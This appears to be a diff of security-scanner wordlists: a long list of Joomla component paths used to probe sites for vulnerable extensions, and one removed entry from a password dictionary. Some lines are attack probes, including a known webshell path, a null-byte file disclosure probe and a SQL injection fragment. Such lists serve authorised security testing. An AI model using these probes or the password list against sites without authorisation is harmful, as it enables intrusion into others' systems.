-components/com_mediaalert/
-components/com_medialibrary/
-components/com_mediamall/
 components/com_mediaslide/
-components/com_mediqna/
-components/com_memorix/
-components/com_memory/
-components/com_memorybook/
-components/com_menu/
 components/com_mezun/
 components/com_mgm/
 components/com_minibb/
 components/com_misterestate/
-components/com_mmp/
 components/com_mmp/help.mmp.php
-components/com_mmsblog/
-components/com_mochigames/
-components/com_mod_dvfoldercontent/
 components/com_model/
-components/com_modern_booking/
-components/com_mojo/
-components/com_monthlyarchive/
-components/com_moodle/
 components/com_moodle/moodle.php
 components/com_moofaq/
-components/com_morfeoshow/
-components/com_mosets/
-components/com_mosforms/
 components/com_mosmedia/
-components/com_mospray/
 components/com_mospray/scripts/admin.php
 components/com_mosres/
 components/com_most/
-components/com_mostwantedrealestate/
-components/com_motor/
-components/com_movm/
-components/com_mp3/
 components/com_mp3_allopass/
-components/com_mscomment/
-components/com_mtfireeagle/
 components/com_mtree/
 components/com_mtree/img/listings/o/{id}.php
-components/com_mtree/img/listings/o/{id}.php where {id}
-components/com_multibanners/
 components/com_multibanners/extadminmenus.class.php
-components/com_multimap/
-components/com_multiroot/
-components/com_multitier/
-components/com_muscol/
-components/com_music/
-components/com_musicgallery/
-components/com_mv_restaurantmenumanager/
 components/com_myalbum/
-components/com_myblog/
-components/com_mycar/
 components/com_mycontent/
 components/com_mydyngallery/
-components/com_myfiles/
-components/com_myform/
 components/com_mygallery/
-components/com_myhome/
-components/com_mymsg/
-components/com_myportfolio/
-components/com_myproject/
-components/com_mysms/
-components/com_mytube/
 components/com_n-forms/
-components/com_na/
 components/com_na_content/
 components/com_na_mydocs/
 components/com_na_newsdescription/
 components/com_na_qforms/
-components/com_nbreal/
 components/com_neogallery/
 components/com_neorecruit/
 components/com_neoreferences/
 components/com_netinvoice/
-components/com_network/
 components/com_news/
 components/com_news_portal/
-components/com_newsfeeds/
 components/com_newsflash/
-components/com_newssearch/
-components/com_nfn/
 components/com_nfn_addressbook/
-components/com_nfnaddressbook/
-components/com_nge/
-components/com_niceajaxpoll/
 components/com_nicetalk/
-components/com_ninjamonial/
-components/com_ninjamonials/
-components/com_nkc/
-components/com_noticeboard/
-components/com_noticia/
 components/com_noticias/
-components/com_novasfh/
-components/com_ns_downloadshop/
-components/com_ob/
-components/com_obSuggest/
-components/com_obsuggest/
-components/com_odudeprofile/
 components/com_omnirealestate/
 components/com_omphotogallery/
-components/com_onevote/
-components/com_ongallery/
 components/com_ongumatimesheet20/
-components/com_onismusic /
-components/com_onismusic/
-components/com_onispetitions/
-components/com_onisquotes/
-components/com_onlineexam/
 components/com_onlineflashquiz/
-components/com_opencart/
-components/com_oprykningspoint_mc/
-components/com_ops/
-components/com_org/
-components/com_orgchart/
-components/com_ornekek/
-components/com_os_cck/
-components/com_osdownloads/
-components/com_osproperty/
-components/com_osservicesbooking/
-components/com_otzivi/
 components/com_ownbiblio/
-components/com_oziogallery/
-components/com_oziogallery2/
-components/com_packages/
-components/com_pandafminigames/
 components/com_panoramic/
-components/com_parcoauto/
-components/com_party/
 components/com_paxgallery/
 components/com_paxxgallery/
-components/com_payage/
-components/com_payplans/
-components/com_pazzari_vm3/
-components/com_pbbooking/
-components/com_pc/
 components/com_pcchess/
 components/com_pcchess/include.pcchess.php
 components/com_pccookbook/
 components/com_pccookbook/pccookbook.php
-components/com_people/
-components/com_peoplebook/
 components/com_peoplebook/param.peoplebook.php
-components/com_perchagallery/
-components/com_perchaimageattach/
 components/com_performs/
-components/com_personal/
 components/com_philaform/
 components/com_phocadocumentation/
-components/com_phocadownload/
-components/com_phocagallery/
-components/com_phocamaps/
-components/com_photo/
-components/com_photobattle/
-components/com_photoblog/
-components/com_photocontest/
-components/com_photomapgallery/
 components/com_php/
-components/com_phpbridge/
-components/com_phpshop/
 components/com_phpshop/toolbar.phpshop.html.php
-components/com_picasa2gallery/
-components/com_picsell/
 components/com_pinboard/
 components/com_pms/
-components/com_pofos/
 components/com_poll/
 components/com_pollxt/
 components/com_ponygallery/
 components/com_portafolio/
 components/com_portfol/
-components/com_portfolio/
-components/com_portfoliogallery/
-components/com_poweradmin/
-components/com_powermail/
 components/com_prayercenter/
-components/com_press/
-components/com_pressrelease/
-components/com_preventive/
-components/com_price_alert/
-components/com_prime/
-components/com_pro/
 components/com_pro_desk/
 components/com_prod/
-components/com_product/
-components/com_product_modul/
-components/com_productbook/
-components/com_products/
 components/com_productshowcase/
-components/com_profile/
 components/com_profiler/
 components/com_projectfork/
-components/com_projectlog/
-components/com_projects/
-components/com_proofreader/
-components/com_properties/
 components/com_propertylab/
 components/com_puarcade/
 components/com_publication/
-components/com_publisher/
-components/com_qcontacts/
-components/com_qpersonel/
-components/com_question/
-components/com_quickfaq/
-components/com_quicknews/
 components/com_quiz/
-components/com_quran/
-components/com_races/
-components/com_radio/
-components/com_rand/
-components/com_ranking/
 components/com_rapidrecipe/
-components/com_rd_download/
 components/com_rdautos/
 components/com_realestatemanager/
-components/com_realpin/
-components/com_realtyna/
-components/com_recerca/
-components/com_recipe/
 components/com_recly/
-components/com_record/
-components/com_redshop/
-components/com_redtwitter/
 components/com_referenzen/
-components/com_registration/
-components/com_registrationpro/
 components/com_rekry/
-components/com_remository/
 components/com_remository/admin.remository.php
 components/com_remository_files/file_image_14/1276100016shell.php
-components/com_reporter/
 components/com_reporter/processor/reporter.sql.php
-components/com_reservations/
 components/com_resman/
 components/com_restaurante/
-components/com_restaurantguide/
 components/com_ricette/
-components/com_rokcandy/
-components/com_rokdownloads/
-components/com_rokmodule/
-components/com_roommgmt/
-components/com_route/
-components/com_rpl/
-components/com_rpx/
-components/com_rsappt_pro2/
-components/com_rsappt_pro3/
-components/com_rsbook_15/
-components/com_rscomments/
 components/com_rsfiles/
-components/com_rsform/
 components/com_rsgallery/
 components/com_rsgallery2/
-components/com_rsmonials/
 components/com_rss/
 components/com_rssreader/
 components/com_rssxt/
 components/com_rwcards/
-components/com_s5_media_player/
-components/com_s5clanroster/
-components/com_salesrep/
-components/com_sanpham/
-components/com_sar_news/
-components/com_saxumastro/
-components/com_saxumnumerology/
-components/com_saxumpicker/
-components/com_sbsfile/
-components/com_scheduling/
 components/com_school/
-components/com_schools/
-components/com_science/
 components/com_search/
-components/com_searchlog/
-components/com_sebercart/
 components/com_sebercart/getPic.php?p=[LFD]%00
-components/com_sectionex/
 components/com_securityimages/
-components/com_seek/
 components/com_sef/
 components/com_seminar/
-components/com_serie/
-components/com_sermon/
-components/com_sermonspeaker/
-components/com_serverstat/
 components/com_serverstat/install.serverstat.php
-components/com_sexypolling/
-components/com_seyret/
 components/com_sg/
-components/com_sgicatalog/
-components/com_shop/
-components/com_shoutbox/
-components/com_showdown/
-components/com_siirler/
-components/com_simgenealogy/
-components/com_simple/
 components/com_simple_review/
 components/com_simpleboard/
-components/com_simplecalendar/
-components/com_simpledownload/
 components/com_simplefaq/
-components/com_simpleimageupload/
-components/com_simplemembership/
-components/com_simplephotogallery/
 components/com_simpleshop/
-components/com_simpleswfupload/
-components/com_sitemap/
 components/com_sitemap/sitemap.xml.php
-components/com_slider/
 components/com_slideshow/
-components/com_smartseller/
-components/com_smartshoutbox/
-components/com_smartsite/
-components/com_smestorage/
 components/com_smf/
 components/com_smf/smf.php
-components/com_smslist/
-components/com_sobi2/
-components/com_soccerbet/
-components/com_socialads/
-components/com_socialpinboard/
-components/com_software/
-components/com_solidres/
-components/com_solution/
-components/com_some/
-components/com_soundset/
-components/com_spa/
-components/com_spain/
-components/com_spec/
-components/com_spidercalendar/
-components/com_spidercatalog/
-components/com_spiderfacebook/
-components/com_spiderfaq/
-components/com_spielothek/
-components/com_spmoviedb/
-components/com_sponsorwall/
-components/com_sportfusion/
-components/com_sportspredictions/
-components/com_spsnewsletter/
-components/com_sqlreport/
-components/com_squadmanagement/
-components/com_staffmaster/
-components/com_start/
-components/com_staticxt/
-components/com_store/
-components/com_storedirectory/
-components/com_streetguess/
-components/com_surveyforce/
-components/com_surveymanager/
-components/com_svmap/
-components/com_sweetykeeper/
-components/com_swmenufree4/
 components/com_swmenupro/
-components/com_szallasok/
-components/com_tag/
-components/com_tariff/
-components/com_tax/
-components/com_teacher/
 components/com_team/
-components/com_teamdisplay/
-components/com_teams/
-components/com_tech/
 components/com_tech_article/
-components/com_techfolio/
-components/com_television/
 components/com_thopper/
-components/com_threate/
 components/com_thyme/
-components/com_ticketbook/
 components/com_tickets/
-components/com_tienda/
-components/com_timereturns/
-components/com_timetable/
-components/com_timetrack/
 components/com_tophotelmodule/
-components/com_topics/
-components/com_topmenu/
-components/com_tour/
 components/com_tour_toto/
-components/com_tpdugg/
-components/com_tpjobs/
-components/com_trabalhe_conosco/
 components/com_trade/
-components/com_trading/
-components/com_travelbook/
-components/com_tree/
-components/com_treeg/
-components/com_tsonymf/
-components/com_ttvideo/
-components/com_tupinambis/
-components/com_turtushout/
-components/com_tweetla/
-components/com_twitchtv/
 components/com_uhp/
 components/com_uhp2/
-components/com_ultimateportfolio/
-components/com_uniterevolution2/
-components/com_units/
-components/com_universal/
-components/com_upl/
-components/com_user/
 components/com_user/controller.php
-components/com_userbench/
-components/com_userextranet/
 components/com_users/
-components/com_userstatus/
-components/com_utchat/
 components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php
 components/com_vehiclemanager/
 components/com_versioning /
-components/com_versioning/
-components/com_videodb/
 components/com_videodb/core/videodb.class.xml.php
-components/com_videoflow/
-components/com_videogallery/
-components/com_videogallerylite/
-components/com_videos/
-components/com_videowhisper_2wvc/
-components/com_vikappointments/
-components/com_vikbooking/
-components/com_vikrealestate/
-components/com_vikrentcar/
-components/com_vikrentitems/
-components/com_virtualmoney/
 components/com_virtuemart/
-components/com_visa/
-components/com_visualcalendar/
-components/com_vjdeo/
-components/com_vmap/
-components/com_voj/
 components/com_volunteer/
 components/com_vr/
-components/com_vxdate/
-components/com_wallpapers/
 components/com_waticketsystem/
-components/com_wddownload/
-components/com_wdsubscriptions/
-components/com_webeecomment/
-components/com_weberpcustomer/
 components/com_webhosting/
 components/com_weblinks/
 components/com_webring/
-components/com_webtv/
-components/com_wgpicasa/
-components/com_wines/
-components/com_wire_immogest/
-components/com_wisroyq/
-components/com_wmi/
-components/com_wmt_content_timeline/
 components/com_wmtgallery/
-components/com_wmtpic/
 components/com_wmtportfolio/
-components/com_wmtrssreader/
-components/com_worldrates/
-components/com_wrapper/
 components/com_x-shop/
-components/com_xball/
-components/com_xcloner-backupandrestore/
-components/com_xcomp/
-components/com_xeslidegalfx/
 components/com_xevidmegahd/
 components/com_xewebtv/
 components/com_xfaq/
-components/com_xgallery/
 components/com_xgallery/helpers/img.php?file=
-components/com_xmap/
-components/com_xmovie/
-components/com_xobbix/
 components/com_xsstream-dm/
-components/com_xvs/
-components/com_yanc/
-components/com_ybggal/
-components/com_yellowpages/
-components/com_yelp/
-components/com_yjcontactus/
 components/com_ynews/
-components/com_youtube/
-components/com_youtubegallery/
 components/com_yvcomment/
-components/com_zcalendar/
-components/com_zelig/
-components/com_zhbaidumap/
-components/com_zhgooglemap/
-components/com_zhyandexmap/
-components/com_zimbcomment/
-components/com_zimbcore/
-components/com_zina/
-components/com_zoom/
 components/com_zoom/classes/
-components/com_zoomportfolio/
-components/com_ztautolink/
-components/icom_nvitex/
 components/mod_letterman/
 components/remository/
 eXtplorer/
 easyblog/entry/uncategorized
 extplorer/
+components/com_mtree/img/listings/o/{id}.php where {id}
 includes/joomla.php
 index.php/404'
 index.php/?option=com_question&catID=21' and+1=0 union all

data/wordlists/password.lst

@@ -86241,7 +86241,6 @@ wharves
 what
 whatchamacallit
 whatever
-whatevers2009
 whatley
 whatnot
 whatshername